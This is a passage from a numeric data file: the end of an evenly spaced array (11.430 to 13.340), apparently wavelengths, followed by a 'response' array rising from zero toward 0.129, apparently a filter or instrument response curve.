11.430, 11.431, 11.432, 11.433, 11.434, 11.435, 11.436, 11.437, 11.438,
11.439, 11.440, 11.441, 11.442, 11.443, 11.444, 11.445, 11.446, 11.447,
11.448, 11.449, 11.450, 11.451, 11.452, 11.453, 11.454, 11.455, 11.456,
11.457, 11.458, 11.459, 11.460, 11.461, 11.462, 11.463, 11.464, 11.465,
11.466, 11.467, 11.468, 11.469, 11.470, 11.471, 11.472, 11.473, 11.474,
11.475, 11.476, 11.477, 11.478, 11.479, 11.480, 11.481, 11.482, 11.483,
11.484, 11.485, 11.486, 11.487, 11.488, 11.489, 11.490, 11.491, 11.492,
11.493, 11.494, 11.495, 11.496, 11.497, 11.498, 11.499, 11.500, 11.501,
11.502, 11.503, 11.504, 11.505, 11.506, 11.507, 11.508, 11.509, 11.510,
11.511, 11.512, 11.513, 11.514, 11.515, 11.516, 11.517, 11.518, 11.519,
11.520, 11.521, 11.522, 11.523, 11.524, 11.525, 11.526, 11.527, 11.528,
11.529, 11.530, 11.531, 11.532, 11.533, 11.534, 11.535, 11.536, 11.537,
11.538, 11.539, 11.540, 11.541, 11.542, 11.543, 11.544, 11.545, 11.546,
11.547, 11.548, 11.549, 11.550, 11.551, 11.552, 11.553, 11.554, 11.555,
11.556, 11.557, 11.558, 11.559, 11.560, 11.561, 11.562, 11.563, 11.564,
11.565, 11.566, 11.567, 11.568, 11.569, 11.570, 11.571, 11.572, 11.573,
11.574, 11.575, 11.576, 11.577, 11.578, 11.579, 11.580, 11.581, 11.582,
11.583, 11.584, 11.585, 11.586, 11.587, 11.588, 11.589, 11.590, 11.591,
11.592, 11.593, 11.594, 11.595, 11.596, 11.597, 11.598, 11.599, 11.600,
11.601, 11.602, 11.603, 11.604, 11.605, 11.606, 11.607, 11.608, 11.609,
11.610, 11.611, 11.612, 11.613, 11.614, 11.615, 11.616, 11.617, 11.618,
11.619, 11.620, 11.621, 11.622, 11.623, 11.624, 11.625, 11.626, 11.627,
11.628, 11.629, 11.630, 11.631, 11.632, 11.633, 11.634, 11.635, 11.636,
11.637, 11.638, 11.639, 11.640, 11.641, 11.642, 11.643, 11.644, 11.645,
11.646, 11.647, 11.648, 11.649, 11.650, 11.651, 11.652, 11.653, 11.654,
11.655, 11.656, 11.657, 11.658, 11.659, 11.660, 11.661, 11.662, 11.663,
11.664, 11.665, 11.666, 11.667, 11.668, 11.669, 11.670, 11.671, 11.672,
11.673, 11.674, 11.675, 11.676, 11.677, 11.678, 11.679, 11.680, 11.681,
11.682, 11.683, 11.684, 11.685, 11.686, 11.687, 11.688, 11.689, 11.690,
11.691, 11.692, 11.693, 11.694, 11.695, 11.696, 11.697, 11.698, 11.699,
11.700, 11.701, 11.702, 11.703, 11.704, 11.705, 11.706, 11.707, 11.708,
11.709, 11.710, 11.711, 11.712, 11.713, 11.714, 11.715, 11.716, 11.717,
11.718, 11.719, 11.720, 11.721, 11.722, 11.723, 11.724, 11.725, 11.726,
11.727, 11.728, 11.729, 11.730, 11.731, 11.732, 11.733, 11.734, 11.735,
11.736, 11.737, 11.738, 11.739, 11.740, 11.741, 11.742, 11.743, 11.744,
11.745, 11.746, 11.747, 11.748, 11.749, 11.750, 11.751, 11.752, 11.753,
11.754, 11.755, 11.756, 11.757, 11.758, 11.759, 11.760, 11.761, 11.762,
11.763, 11.764, 11.765, 11.766, 11.767, 11.768, 11.769, 11.770, 11.771,
11.772, 11.773, 11.774, 11.775, 11.776, 11.777, 11.778, 11.779, 11.780,
11.781, 11.782, 11.783, 11.784, 11.785, 11.786, 11.787, 11.788, 11.789,
11.790, 11.791, 11.792, 11.793, 11.794, 11.795, 11.796, 11.797, 11.798,
11.799, 11.800, 11.801, 11.802, 11.803, 11.804, 11.805, 11.806, 11.807,
11.808, 11.809, 11.810, 11.811, 11.812, 11.813, 11.814, 11.815, 11.816,
11.817, 11.818, 11.819, 11.820, 11.821, 11.822, 11.823, 11.824, 11.825,
11.826, 11.827, 11.828, 11.829, 11.830, 11.831, 11.832, 11.833, 11.834,
11.835, 11.836, 11.837, 11.838, 11.839, 11.840, 11.841, 11.842, 11.843,
11.844, 11.845, 11.846, 11.847, 11.848, 11.849, 11.850, 11.851, 11.852,
11.853, 11.854, 11.855, 11.856, 11.857, 11.858, 11.859, 11.860, 11.861,
11.862, 11.863, 11.864, 11.865, 11.866, 11.867, 11.868, 11.869, 11.870,
11.871, 11.872, 11.873, 11.874, 11.875, 11.876, 11.877, 11.878, 11.879,
11.880, 11.881, 11.882, 11.883, 11.884, 11.885, 11.886, 11.887, 11.888,
11.889, 11.890, 11.891, 11.892, 11.893, 11.894, 11.895, 11.896, 11.897,
11.898, 11.899, 11.900, 11.901, 11.902, 11.903, 11.904, 11.905, 11.906,
11.907, 11.908, 11.909, 11.910, 11.911, 11.912, 11.913, 11.914, 11.915,
11.916, 11.917, 11.918, 11.919, 11.920, 11.921, 11.922, 11.923, 11.924,
11.925, 11.926, 11.927, 11.928, 11.929, 11.930, 11.931, 11.932, 11.933,
11.934, 11.935, 11.936, 11.937, 11.938, 11.939, 11.940, 11.941, 11.942,
11.943, 11.944, 11.945, 11.946, 11.947, 11.948, 11.949, 11.950, 11.951,
11.952, 11.953, 11.954, 11.955, 11.956, 11.957, 11.958, 11.959, 11.960,
11.961, 11.962, 11.963, 11.964, 11.965, 11.966, 11.967, 11.968, 11.969,
11.970, 11.971, 11.972, 11.973, 11.974, 11.975, 11.976, 11.977, 11.978,
11.979, 11.980, 11.981, 11.982, 11.983, 11.984, 11.985, 11.986, 11.987,
11.988, 11.989, 11.990, 11.991, 11.992, 11.993, 11.994, 11.995, 11.996,
11.997, 11.998, 11.999, 12.000, 12.001, 12.002, 12.003, 12.004, 12.005,
12.006, 12.007, 12.008, 12.009, 12.010, 12.011, 12.012, 12.013, 12.014,
12.015, 12.016, 12.017, 12.018, 12.019, 12.020, 12.021, 12.022, 12.023,
12.024, 12.025, 12.026, 12.027, 12.028, 12.029, 12.030, 12.031, 12.032,
12.033, 12.034, 12.035, 12.036, 12.037, 12.038, 12.039, 12.040, 12.041,
12.042, 12.043, 12.044, 12.045, 12.046, 12.047, 12.048, 12.049, 12.050,
12.051, 12.052, 12.053, 12.054, 12.055, 12.056, 12.057, 12.058, 12.059,
12.060, 12.061, 12.062, 12.063, 12.064, 12.065, 12.066, 12.067, 12.068,
12.069, 12.070, 12.071, 12.072, 12.073, 12.074, 12.075, 12.076, 12.077,
12.078, 12.079, 12.080, 12.081, 12.082, 12.083, 12.084, 12.085, 12.086,
12.087, 12.088, 12.089, 12.090, 12.091, 12.092, 12.093, 12.094, 12.095,
12.096, 12.097, 12.098, 12.099, 12.100, 12.101, 12.102, 12.103, 12.104,
12.105, 12.106, 12.107, 12.108, 12.109, 12.110, 12.111, 12.112, 12.113,
12.114, 12.115, 12.116, 12.117, 12.118, 12.119, 12.120, 12.121, 12.122,
12.123, 12.124, 12.125, 12.126, 12.127, 12.128, 12.129, 12.130, 12.131,
12.132, 12.133, 12.134, 12.135, 12.136, 12.137, 12.138, 12.139, 12.140,
12.141, 12.142, 12.143, 12.144, 12.145, 12.146, 12.147, 12.148, 12.149,
12.150, 12.151, 12.152, 12.153, 12.154, 12.155, 12.156, 12.157, 12.158,
12.159, 12.160, 12.161, 12.162, 12.163, 12.164, 12.165, 12.166, 12.167,
12.168, 12.169, 12.170, 12.171, 12.172, 12.173, 12.174, 12.175, 12.176,
12.177, 12.178, 12.179, 12.180, 12.181, 12.182, 12.183, 12.184, 12.185,
12.186, 12.187, 12.188, 12.189, 12.190, 12.191, 12.192, 12.193, 12.194,
12.195, 12.196, 12.197, 12.198, 12.199, 12.200, 12.201, 12.202, 12.203,
12.204, 12.205, 12.206, 12.207, 12.208, 12.209, 12.210, 12.211, 12.212,
12.213, 12.214, 12.215, 12.216, 12.217, 12.218, 12.219, 12.220, 12.221,
12.222, 12.223, 12.224, 12.225, 12.226, 12.227, 12.228, 12.229, 12.230,
12.231, 12.232, 12.233, 12.234, 12.235, 12.236, 12.237, 12.238, 12.239,
12.240, 12.241, 12.242, 12.243, 12.244, 12.245, 12.246, 12.247, 12.248,
12.249, 12.250, 12.251, 12.252, 12.253, 12.254, 12.255, 12.256, 12.257,
12.258, 12.259, 12.260, 12.261, 12.262, 12.263, 12.264, 12.265, 12.266,
12.267, 12.268, 12.269, 12.270, 12.271, 12.272, 12.273, 12.274, 12.275,
12.276, 12.277, 12.278, 12.279, 12.280, 12.281, 12.282, 12.283, 12.284,
12.285, 12.286, 12.287, 12.288, 12.289, 12.290, 12.291, 12.292, 12.293,
12.294, 12.295, 12.296, 12.297, 12.298, 12.299, 12.300, 12.301, 12.302,
12.303, 12.304, 12.305, 12.306, 12.307, 12.308, 12.309, 12.310, 12.311,
12.312, 12.313, 12.314, 12.315, 12.316, 12.317, 12.318, 12.319, 12.320,
12.321, 12.322, 12.323, 12.324, 12.325, 12.326, 12.327, 12.328, 12.329,
12.330, 12.331, 12.332, 12.333, 12.334, 12.335, 12.336, 12.337, 12.338,
12.339, 12.340, 12.341, 12.342, 12.343, 12.344, 12.345, 12.346, 12.347,
12.348, 12.349, 12.350, 12.351, 12.352, 12.353, 12.354, 12.355, 12.356,
12.357, 12.358, 12.359, 12.360, 12.361, 12.362, 12.363, 12.364, 12.365,
12.366, 12.367, 12.368, 12.369, 12.370, 12.371, 12.372, 12.373, 12.374,
12.375, 12.376, 12.377, 12.378, 12.379, 12.380, 12.381, 12.382, 12.383,
12.384, 12.385, 12.386, 12.387, 12.388, 12.389, 12.390, 12.391, 12.392,
12.393, 12.394, 12.395, 12.396, 12.397, 12.398, 12.399, 12.400, 12.401,
12.402, 12.403, 12.404, 12.405, 12.406, 12.407, 12.408, 12.409, 12.410,
12.411, 12.412, 12.413, 12.414, 12.415, 12.416, 12.417, 12.418, 12.419,
12.420, 12.421, 12.422, 12.423, 12.424, 12.425, 12.426, 12.427, 12.428,
12.429, 12.430, 12.431, 12.432, 12.433, 12.434, 12.435, 12.436, 12.437,
12.438, 12.439, 12.440, 12.441, 12.442, 12.443, 12.444, 12.445, 12.446,
12.447, 12.448, 12.449, 12.450, 12.451, 12.452, 12.453, 12.454, 12.455,
12.456, 12.457, 12.458, 12.459, 12.460, 12.461, 12.462, 12.463, 12.464,
12.465, 12.466, 12.467, 12.468, 12.469, 12.470, 12.471, 12.472, 12.473,
12.474, 12.475, 12.476, 12.477, 12.478, 12.479, 12.480, 12.481, 12.482,
12.483, 12.484, 12.485, 12.486, 12.487, 12.488, 12.489, 12.490, 12.491,
12.492, 12.493, 12.494, 12.495, 12.496, 12.497, 12.498, 12.499, 12.500,
12.501, 12.502, 12.503, 12.504, 12.505, 12.506, 12.507, 12.508, 12.509,
12.510, 12.511, 12.512, 12.513, 12.514, 12.515, 12.516, 12.517, 12.518,
12.519, 12.520, 12.521, 12.522, 12.523, 12.524, 12.525, 12.526, 12.527,
12.528, 12.529, 12.530, 12.531, 12.532, 12.533, 12.534, 12.535, 12.536,
12.537, 12.538, 12.539, 12.540, 12.541, 12.542, 12.543, 12.544, 12.545,
12.546, 12.547, 12.548, 12.549, 12.550, 12.551, 12.552, 12.553, 12.554,
12.555, 12.556, 12.557, 12.558, 12.559, 12.560, 12.561, 12.562, 12.563,
12.564, 12.565, 12.566, 12.567, 12.568, 12.569, 12.570, 12.571, 12.572,
12.573, 12.574, 12.575, 12.576, 12.577, 12.578, 12.579, 12.580, 12.581,
12.582, 12.583, 12.584, 12.585, 12.586, 12.587, 12.588, 12.589, 12.590,
12.591, 12.592, 12.593, 12.594, 12.595, 12.596, 12.597, 12.598, 12.599,
12.600, 12.601, 12.602, 12.603, 12.604, 12.605, 12.606, 12.607, 12.608,
12.609, 12.610, 12.611, 12.612, 12.613, 12.614, 12.615, 12.616, 12.617,
12.618, 12.619, 12.620, 12.621, 12.622, 12.623, 12.624, 12.625, 12.626,
12.627, 12.628, 12.629, 12.630, 12.631, 12.632, 12.633, 12.634, 12.635,
12.636, 12.637, 12.638, 12.639, 12.640, 12.641, 12.642, 12.643, 12.644,
12.645, 12.646, 12.647, 12.648, 12.649, 12.650, 12.651, 12.652, 12.653,
12.654, 12.655, 12.656, 12.657, 12.658, 12.659, 12.660, 12.661, 12.662,
12.663, 12.664, 12.665, 12.666, 12.667, 12.668, 12.669, 12.670, 12.671,
12.672, 12.673, 12.674, 12.675, 12.676, 12.677, 12.678, 12.679, 12.680,
12.681, 12.682, 12.683, 12.684, 12.685, 12.686, 12.687, 12.688, 12.689,
12.690, 12.691, 12.692, 12.693, 12.694, 12.695, 12.696, 12.697, 12.698,
12.699, 12.700, 12.701, 12.702, 12.703, 12.704, 12.705, 12.706, 12.707,
12.708, 12.709, 12.710, 12.711, 12.712, 12.713, 12.714, 12.715, 12.716,
12.717, 12.718, 12.719, 12.720, 12.721, 12.722, 12.723, 12.724, 12.725,
12.726, 12.727, 12.728, 12.729, 12.730, 12.731, 12.732, 12.733, 12.734,
12.735, 12.736, 12.737, 12.738, 12.739, 12.740, 12.741, 12.742, 12.743,
12.744, 12.745, 12.746, 12.747, 12.748, 12.749, 12.750, 12.751, 12.752,
12.753, 12.754, 12.755, 12.756, 12.757, 12.758, 12.759, 12.760, 12.761,
12.762, 12.763, 12.764, 12.765, 12.766, 12.767, 12.768, 12.769, 12.770,
12.771, 12.772, 12.773, 12.774, 12.775, 12.776, 12.777, 12.778, 12.779,
12.780, 12.781, 12.782, 12.783, 12.784, 12.785, 12.786, 12.787, 12.788,
12.789, 12.790, 12.791, 12.792, 12.793, 12.794, 12.795, 12.796, 12.797,
12.798, 12.799, 12.800, 12.801, 12.802, 12.803, 12.804, 12.805, 12.806,
12.807, 12.808, 12.809, 12.810, 12.811, 12.812, 12.813, 12.814, 12.815,
12.816, 12.817, 12.818, 12.819, 12.820, 12.821, 12.822, 12.823, 12.824,
12.825, 12.826, 12.827, 12.828, 12.829, 12.830, 12.831, 12.832, 12.833,
12.834, 12.835, 12.836, 12.837, 12.838, 12.839, 12.840, 12.841, 12.842,
12.843, 12.844, 12.845, 12.846, 12.847, 12.848, 12.849, 12.850, 12.851,
12.852, 12.853, 12.854, 12.855, 12.856, 12.857, 12.858, 12.859, 12.860,
12.861, 12.862, 12.863, 12.864, 12.865, 12.866, 12.867, 12.868, 12.869,
12.870, 12.871, 12.872, 12.873, 12.874, 12.875, 12.876, 12.877, 12.878,
12.879, 12.880, 12.881, 12.882, 12.883, 12.884, 12.885, 12.886, 12.887,
12.888, 12.889, 12.890, 12.891, 12.892, 12.893, 12.894, 12.895, 12.896,
12.897, 12.898, 12.899, 12.900, 12.901, 12.902, 12.903, 12.904, 12.905,
12.906, 12.907, 12.908, 12.909, 12.910, 12.911, 12.912, 12.913, 12.914,
12.915, 12.916, 12.917, 12.918, 12.919, 12.920, 12.921, 12.922, 12.923,
12.924, 12.925, 12.926, 12.927, 12.928, 12.929, 12.930, 12.931, 12.932,
12.933, 12.934, 12.935, 12.936, 12.937, 12.938, 12.939, 12.940, 12.941,
12.942, 12.943, 12.944, 12.945, 12.946, 12.947, 12.948, 12.949, 12.950,
12.951, 12.952, 12.953, 12.954, 12.955, 12.956, 12.957, 12.958, 12.959,
12.960, 12.961, 12.962, 12.963, 12.964, 12.965, 12.966, 12.967, 12.968,
12.969, 12.970, 12.971, 12.972, 12.973, 12.974, 12.975, 12.976, 12.977,
12.978, 12.979, 12.980, 12.981, 12.982, 12.983, 12.984, 12.985, 12.986,
12.987, 12.988, 12.989, 12.990, 12.991, 12.992, 12.993, 12.994, 12.995,
12.996, 12.997, 12.998, 12.999, 13.000, 13.001, 13.002, 13.003, 13.004,
13.005, 13.006, 13.007, 13.008, 13.009, 13.010, 13.011, 13.012, 13.013,
13.014, 13.015, 13.016, 13.017, 13.018, 13.019, 13.020, 13.021, 13.022,
13.023, 13.024, 13.025, 13.026, 13.027, 13.028, 13.029, 13.030, 13.031,
13.032, 13.033, 13.034, 13.035, 13.036, 13.037, 13.038, 13.039, 13.040,
13.041, 13.042, 13.043, 13.044, 13.045, 13.046, 13.047, 13.048, 13.049,
13.050, 13.051, 13.052, 13.053, 13.054, 13.055, 13.056, 13.057, 13.058,
13.059, 13.060, 13.061, 13.062, 13.063, 13.064, 13.065, 13.066, 13.067,
13.068, 13.069, 13.070, 13.071, 13.072, 13.073, 13.074, 13.075, 13.076,
13.077, 13.078, 13.079, 13.080, 13.081, 13.082, 13.083, 13.084, 13.085,
13.086, 13.087, 13.088, 13.089, 13.090, 13.091, 13.092, 13.093, 13.094,
13.095, 13.096, 13.097, 13.098, 13.099, 13.100, 13.101, 13.102, 13.103,
13.104, 13.105, 13.106, 13.107, 13.108, 13.109, 13.110, 13.111, 13.112,
13.113, 13.114, 13.115, 13.116, 13.117, 13.118, 13.119, 13.120, 13.121,
13.122, 13.123, 13.124, 13.125, 13.126, 13.127, 13.128, 13.129, 13.130,
13.131, 13.132, 13.133, 13.134, 13.135, 13.136, 13.137, 13.138, 13.139,
13.140, 13.141, 13.142, 13.143, 13.144, 13.145, 13.146, 13.147, 13.148,
13.149, 13.150, 13.151, 13.152, 13.153, 13.154, 13.155, 13.156, 13.157,
13.158, 13.159, 13.160, 13.161, 13.162, 13.163, 13.164, 13.165, 13.166,
13.167, 13.168, 13.169, 13.170, 13.171, 13.172, 13.173, 13.174, 13.175,
13.176, 13.177, 13.178, 13.179, 13.180, 13.181, 13.182, 13.183, 13.184,
13.185, 13.186, 13.187, 13.188, 13.189, 13.190, 13.191, 13.192, 13.193,
13.194, 13.195, 13.196, 13.197, 13.198, 13.199, 13.200, 13.201, 13.202,
13.203, 13.204, 13.205, 13.206, 13.207, 13.208, 13.209, 13.210, 13.211,
13.212, 13.213, 13.214, 13.215, 13.216, 13.217, 13.218, 13.219, 13.220,
13.221, 13.222, 13.223, 13.224, 13.225, 13.226, 13.227, 13.228, 13.229,
13.230, 13.231, 13.232, 13.233, 13.234, 13.235, 13.236, 13.237, 13.238,
13.239, 13.240, 13.241, 13.242, 13.243, 13.244, 13.245, 13.246, 13.247,
13.248, 13.249, 13.250, 13.251, 13.252, 13.253, 13.254, 13.255, 13.256,
13.257, 13.258, 13.259, 13.260, 13.261, 13.262, 13.263, 13.264, 13.265,
13.266, 13.267, 13.268, 13.269, 13.270, 13.271, 13.272, 13.273, 13.274,
13.275, 13.276, 13.277, 13.278, 13.279, 13.280, 13.281, 13.282, 13.283,
13.284, 13.285, 13.286, 13.287, 13.288, 13.289, 13.290, 13.291, 13.292,
13.293, 13.294, 13.295, 13.296, 13.297, 13.298, 13.299, 13.300, 13.301,
13.302, 13.303, 13.304, 13.305, 13.306, 13.307, 13.308, 13.309, 13.310,
13.311, 13.312, 13.313, 13.314, 13.315, 13.316, 13.317, 13.318, 13.319,
13.320, 13.321, 13.322, 13.323, 13.324, 13.325, 13.326, 13.327, 13.328,
13.329, 13.330, 13.331, 13.332, 13.333, 13.334, 13.335, 13.336, 13.337,
13.338, 13.339, 13.340],
'response':[
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.006, 0.006, 0.006, 0.006,
0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006,
0.006, 0.006, 0.006, 0.006, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008,
0.008, 0.008, 0.008, 0.008, 0.008, 0.009, 0.009, 0.009, 0.009, 0.009,
0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.010,
0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010,
0.010, 0.010, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011,
0.011, 0.011, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012,
0.012, 0.012, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013,
0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.015, 0.015,
0.015, 0.015, 0.015, 0.015, 0.015, 0.015, 0.016, 0.016, 0.016, 0.016,
0.016, 0.016, 0.016, 0.017, 0.017, 0.017, 0.017, 0.017, 0.017, 0.018,
0.018, 0.018, 0.018, 0.018, 0.018, 0.019, 0.019, 0.019, 0.019, 0.019,
0.019, 0.020, 0.020, 0.020, 0.020, 0.020, 0.021, 0.021, 0.021, 0.021,
0.021, 0.022, 0.022, 0.022, 0.022, 0.022, 0.023, 0.023, 0.023, 0.023,
0.024, 0.024, 0.024, 0.024, 0.025, 0.025, 0.025, 0.025, 0.025, 0.026,
0.026, 0.026, 0.027, 0.027, 0.027, 0.027, 0.028, 0.028, 0.028, 0.028,
0.029, 0.029, 0.029, 0.030, 0.030, 0.030, 0.030, 0.031, 0.031, 0.031,
0.032, 0.032, 0.032, 0.033, 0.033, 0.033, 0.034, 0.034, 0.034, 0.035,
0.035, 0.035, 0.036, 0.036, 0.036, 0.037, 0.037, 0.037, 0.038, 0.038,
0.038, 0.039, 0.039, 0.040, 0.040, 0.040, 0.041, 0.041, 0.042, 0.042,
0.042, 0.043, 0.043, 0.044, 0.044, 0.045, 0.045, 0.046, 0.046, 0.046,
0.047, 0.047, 0.048, 0.048, 0.049, 0.049, 0.050, 0.050, 0.051, 0.051,
0.052, 0.052, 0.053, 0.053, 0.054, 0.055, 0.055, 0.056, 0.056, 0.057,
0.057, 0.058, 0.059, 0.059, 0.060, 0.060, 0.061, 0.062, 0.062, 0.063,
0.064, 0.064, 0.065, 0.066, 0.066, 0.067, 0.068, 0.068, 0.069, 0.070,
0.070, 0.071, 0.072, 0.073, 0.073, 0.074, 0.075, 0.076, 0.076, 0.077,
0.078, 0.079, 0.079, 0.080, 0.081, 0.082, 0.083, 0.084, 0.084, 0.085,
0.086, 0.087, 0.088, 0.089, 0.090, 0.091, 0.092, 0.093, 0.094, 0.095,
0.096, 0.097, 0.098, 0.099, 0.100, 0.101, 0.102, 0.103, 0.104, 0.105,
0.106, 0.107, 0.108, 0.109, 0.111, 0.112, 0.113, 0.114, 0.115, 0.117,
0.118, 0.119, 0.120, 0.121, 0.123, 0.124, 0.125, 0.127, 0.128, 0.129,
